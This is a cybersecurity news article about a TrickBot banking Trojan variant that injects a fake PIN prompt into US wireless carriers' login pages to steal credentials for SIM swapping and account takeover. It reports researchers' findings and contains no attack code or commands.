Account Takeover Fraud , Business Email Compromise (BEC) , Cybercrime
TrickBot Variant Enables SIM Swapping Attacks: Report
Banking Trojan Evolves to Target Wireless Carrier CustomersA new variant of the TrickBot banking Trojan is enabling attackers to conduct SIM swapping schemes against Verizon Wireless, Sprint and T-Mobile customers in the U.S., potentially paving the way for account takeover fraud, according to a report from Dell's SecureWorks division.
See Also: OnDemand: Assuming control | Can AI reach Autonomous Levels?
The operators of this version of TrickBot are able to intercept a victim's PIN as well as other credentials when they attempt to log onto the websites of the three wireless carriers, according to the report.
This allows for a so-called SIM attack, which involves taking a victim's phone number and porting it to another SIM card that is then under the control of the attackers. Then an attacker can collect one-time passwords or trick telecom employees into giving out information about the victim through social engineering techniques. These moves create opportunities for further attacks, such as account takeover schemes.
"Interception of short message service (SMS)-based authentication tokens or password resets is frequently used during account takeover fraud," the SecureWorks report notes
Increase in Account Takeover
Over the past year, SIM swapping has been used in the U.K. for attempted account takeover attacks that have targeted banks and other financial institutions (see: Failed Fraud Against UK Bank Abused Mobile Infrastructure).
Account takeover attacks can pave the way for credential stuffing - a technique used to guess passwords and users names to steal data or access even more data from a variety of accounts because many people reuse the same credentials over and over again.
Security vendor Akamai released a study earlier this year that found approximately 30 billion credential stuffing attempts during the course of 2018.
In addition, account takeover attacks are also a key component to starting business email compromise scams, which are on the rise (see: 80 Indicted for Scams, Including Business Email Compromises).
TrickBot Variants
First spotted in the wild in 2016 as a banking Trojan, TrickBot has evolved, with criminal groups adjusting the code to carry out a variety of attacks (see: 5 Malware Trends: Emotet Is Hot, Cryptominers Decline).
Other banking Trojans have also found new purposes. For instance, the Emotet banking Trojan has involved into a botnet that undergoes a burst of activity every few months, delivering malicious code to victims before quieting down again. In many cases, Emotet is used to deliver Trickbot as well as ransomware attacks (see: Emotet Botnet Shows Signs of Revival).
In its report, SecureWorks says the new version of TrickBot it discovered was developed by a threat group called "Gold Blackburn," but not much is known about the group’s origins or motivations.
The group uses a technique called "web inject," which intercepts the network traffic of a legitimate website using a command-and-control server. As the user attempts to access the site, the attackers inject malicious code into the website. The attackers use either their own HTML or JavaScript code, according to SecureWorks.
The researchers noticed a TrickBot attack against the Verizon log-in web page on Aug 5. Then, they discovered an attack against T-Mobile on Aug. 12 and Sprint on Aug. 19, according to the report.
In these attacks, once the extra code is injected, a website user is prompted for a PIN before logging in. In the case of Verizon, the legitimate log-in page doesn't ask for a PIN - only the username and password, according to SecureWorks.
After the victim has entered the PIN, password and username, that data is collected by the attackers' command-and-control server, according to SecureWorks.